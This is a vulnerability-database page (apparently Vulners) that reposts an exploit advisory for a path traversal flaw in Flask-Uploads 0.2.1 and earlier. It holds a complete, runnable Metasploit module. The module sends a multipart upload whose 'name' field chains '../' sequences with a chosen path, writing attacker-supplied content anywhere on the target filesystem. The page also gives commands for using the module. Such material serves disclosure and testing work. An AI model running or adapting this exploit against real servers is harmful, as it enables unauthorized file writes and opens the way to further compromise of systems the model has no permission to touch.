Vulners
Lucene search
📄 Flask-Uploads 0.2.1 Path Traversal / Arbitrary File Write
=============================================================================================================================================
| # Title : Flask-Uploads <= 0.2.1 Path Traversal to Arbitrary File Write |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://github.com/maxcountryman/flask-uploads |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/214228/
[+] Summary : This Metasploit module exploits a path traversal vulnerability in the Flask-Uploads library versions 0.2.1 and earlier.
The issue stems from insufficient sanitization of the name parameter used in the save() method of the UploadSet class,
allowing an attacker to traverse directories and write arbitrary files outside the intended upload directory.
The module is designed strictly to demonstrate arbitrary file write capability and does not assume or attempt remote code execution.
File execution depends entirely on application logic, server configuration, and file placement, which are intentionally left out of scope.
Successful exploitation may result in unauthorized file creation on the target filesystem,
potentially enabling further attacks when chained with additional vulnerabilities.
[+] Usage :
use exploit/multi/http/flask_uploads_traversal
set RHOSTS <TARGET_IP>
set RPORT <TARGET_PORT>
set TARGETURI /upload
exploit
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Flask-Uploads <= 0.2.1 Path Traversal Arbitrary File Write',
'Description' => %q{
This module exploits a path traversal vulnerability in the Flask-Uploads
library (version 0.2.1 and prior). The vulnerability allows for arbitrary
file writes outside of the intended upload directory by manipulating the
'name' parameter passed to the save() function. This module focuses on
the file write primitive.
},
'Author' => ['indoushka'],
'License' => MSF_LICENSE,
'References' => [
['URL', 'https://github.com/maxcountryman/flask-uploads/issues/43']
],
'Privileged' => false,
'Platform' => %w[linux win unix],
'Arch' => ARCH_ALL,
'Targets' => [['Generic Arbitrary File Write', {}]],
'DisclosureDate' => '2024-10-25',
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [], # No session guaranteed
'SideEffects' => [ARTIFACTS_ON_DISK]
}
)
)
register_options([
OptString.new('TARGETURI', [true, 'The vulnerable endpoint URL', '/upload']),
OptString.new('FIELD_NAME', [true, 'The multipart field name for the file upload', 'files']),
OptString.new('TRAVERSAL_DEPTH', [true, 'Depth of path traversal to reach root', '10']),
OptString.new('REMOTE_PATH', [true, 'The target path on the remote system', '/tmp/pwned.txt']),
OptString.new('FILE_CONTENT', [true, 'Content to write to the remote file', 'Vulnerability Confirmed'])
])
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
})
return CheckCode::Unknown('No response from the target.') unless res
if res.code == 200
return CheckCode::Detected("Endpoint #{target_uri.path} is reachable.")
end
CheckCode::Safe
end
def exploit
traversal = "../" * datastore['TRAVERSAL_DEPTH'].to_i
remote_filename = datastore['REMOTE_PATH'].sub(%r{^/}, '')
malicious_name = "#{traversal}#{remote_filename}"
data = Rex::MIME::Message.new
data.add_part(
datastore['FILE_CONTENT'],
'text/plain',
nil,
"form-data; name=\"#{datastore['FIELD_NAME']}\"; filename=\"test.txt\""
)
data.add_part(malicious_name, nil, nil, "form-data; name=\"name\"")
print_status("Attempting to write #{datastore['FILE_CONTENT'].length} bytes to #{datastore['REMOTE_PATH']}...")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s
})
if res && res.code == 200
print_good("Server responded with 200 OK. Verification required at: #{datastore['REMOTE_PATH']}")
else
status = res ? res.code : 'no response'
fail_with(Failure::UnexpectedReply, "Server responded with #{status}. Exploitation failed.")
end
end
end
Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Feb 2026 00:00Current
5.5Medium risk
Vulners AI Score5.5